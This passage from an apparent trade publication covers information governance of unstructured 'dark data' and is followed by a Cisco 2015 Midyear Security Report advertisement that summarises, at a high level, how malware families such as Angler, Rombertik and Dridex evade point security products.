• IT departments have no idea what storage systems contain, but are concerned about getting enough budget to keep storing it.
These differing viewpoints lead to conflicts. For example, solicitors often believe it is safest to retain all data in case it is relevant for current or pending litigation. They are mostly driven by a fear of court sanctions for spoliation. However, they don’t recognise that keeping so much data stretches IT department budgets to breaking point and makes information management dramatically more difficult. Approximately 80% of the data organisations store is unstructured: email, social media, instant messages and other communications, documents, images, audio and video. This data has been growing faster than the ability to manage it. As a result, organisations cannot say for sure how much information they have, where it is or what secrets and risks it contains; it is effectively ‘dark data’. This pressing issue affects most organisations today. However, they rarely make an effort to resolve it until they face a ‘trigger event’ such as major litigation or regulatory action. Only then do they find they cannot respond quickly, thoroughly or cost-effectively to information requests. Addressing this situation requires a change in approach. Organisations must realise they cannot rely on content creators or records managers to classify all content. Instead, they must embrace advanced technology tools and processes to enable information managers to search and govern all their unstructured data consistently and repeatedly. This takes place in four stages:
• Providing visibility into the volume, location, format, ownership and content of all data stored across the organisation.
• Using this visibility to thoroughly analyse the data in selected repositories using a variety of powerful and defensible techniques.
• Acting on this analysis by flagging, connecting, quarantining, copying, migrating or disposing of the data identified.
• Re-using the technologies and processes that enabled the first three stages to manage the ongoing creation of data and maintain an ‘evergreen’ state, and then leveraging these investments to conduct further information governance exercises.
Organisations store so much legacy data that it is not practical for information managers to apply policies to it manually. Rather, information governance is about building systems and rules to remediate legacy data and applying those policies to all data created in the future.
Cisco 2015 Midyear Security Report
Combination Attacks Evade Point Solutions
In the first half of 2015, malicious actors demonstrated an elevated level of attack sophistication that leveraged agility, destruction, adaptability, and speed to achieve their objectives. Angler, Rombertik, Adware MultiPlug, and Dridex are the top four most well-known examples of how these combination attacks evade detection, infiltrate defenses, and destroy systems.
Angler: Agility is Its Strength
• 40% user penetration
• 75% of domain shadowing activity leads to Angler
• Compromised landing pages
• Continually throws different ‘hooks’ to increase effectiveness
• Targets and exploits unpatched software
Rombertik: Destructive if Modified
• Obfuscates instructions to memory (over 960M writes), creating a stalling tactic for sandboxes
• Performs excessive activity to flood tracing tools
• Encrypts payload for delayed analysis
• Once past the sandbox, calls a Windows API 335,000 times as an anti-debugging mechanism
• Uses spam and phishing to gain access
• Destroys the master boot record and renders the computer inoperable
Adware MultiPlug: Adapts and Mutates to Evade Detection
• Bundles malicious add-ons with seemingly useful yet unwanted applications
• Shifted away from old URL-encoding scheme to increase penetration rate
• 500 domains used across a three-month period
• 4,000 add-on variants employed
Dridex: Speeding Ahead of the Sensors
• 9 hours to complete a campaign, before traditional antivirus tools can react
• Uses Microsoft® Office macros to quickly deliver banking Trojans
• Up to 850 unique campaigns in the time observed
• Quickly morphs campaign content such as user agents, attachments and referrers, and relaunches the campaign
Point solutions shown as bypassed in the graphic: NBA, Firewall, NGFW, Malware Sandbox, IAM, VPN, NGIPS, IDS, Data Access, Application Control, UTM, Antivirus, Vulnerability Management, AMP, NAC.
The security industry needs to move toward an integrated threat defense to keep pace with combination attacks. To learn more, download the 2015 Midyear Security Report. www.cisco.com/go/msr2015
©2015 Cisco and/or its affiliates. Other company, product and service names may be trademarks or service marks of others.